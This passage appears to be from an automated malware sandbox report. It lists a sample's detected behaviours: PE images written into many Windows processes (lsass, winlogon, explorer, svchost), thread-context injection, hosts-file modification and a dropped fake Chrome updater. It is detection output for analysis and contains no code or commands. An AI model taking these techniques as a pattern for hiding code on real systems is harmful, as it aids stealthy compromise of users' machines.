          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: EB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2FC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 27F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 13C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: A30000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 740000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2820000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3030000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 700000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1110000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2C90000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2AF0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: D60000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2A20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: B60000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 14A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2FB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3130000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 900000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 900000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2C30000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 30F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 10B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 23D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2860000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2BC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2650000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EF0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 750000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2AB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1620000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2B80000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 15A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 8A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 24D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 12A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2110000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 6F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: BE0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 25B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: F20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3070000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: E10000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2980000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3110000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2150000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2910000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3140000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2D20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 730000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2CD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: BC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2730000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2AF0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2360000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3030000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 13D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2FC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1510000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 8B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: F70000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 730000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F6E6AB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 217D6390000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1D29E890000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28189530000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 146F6AD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1BF4B840000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 208BF760000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 23B50E40000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 23B50E70000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CCD9A60000 value starts with: 4D5A
          Injects code into the Windows Explorer (explorer.exe)
          Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4004 base: 86A0000 value: 4D
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeThread register set: target process: 3084Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3820Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 5952Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 6900Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 2248Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 7080
          Modifies the hosts file
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 10DAB2010Jump to behavior
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B020000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA270000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA270000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA270000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA270000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA270000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA270000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA270000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA270000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA270000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA270000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA270000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F6E69A0000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F6E67F0000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 243975010
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B050000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246ED7B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A1980000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670C0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275D1FC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDC90000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227D8FC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2DED2C70000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 220AEFD0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241B6940000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 202A22A0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D25AA0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A63950000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1834ABC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 256EBEB0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2568E1B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 226A7DC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 12A0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22B68FC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA5B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE9B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 11CD6340000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24708EB0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26E569B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC20000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6963C0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2D90000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 86A0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6FC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968280000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5C00000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE850000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000
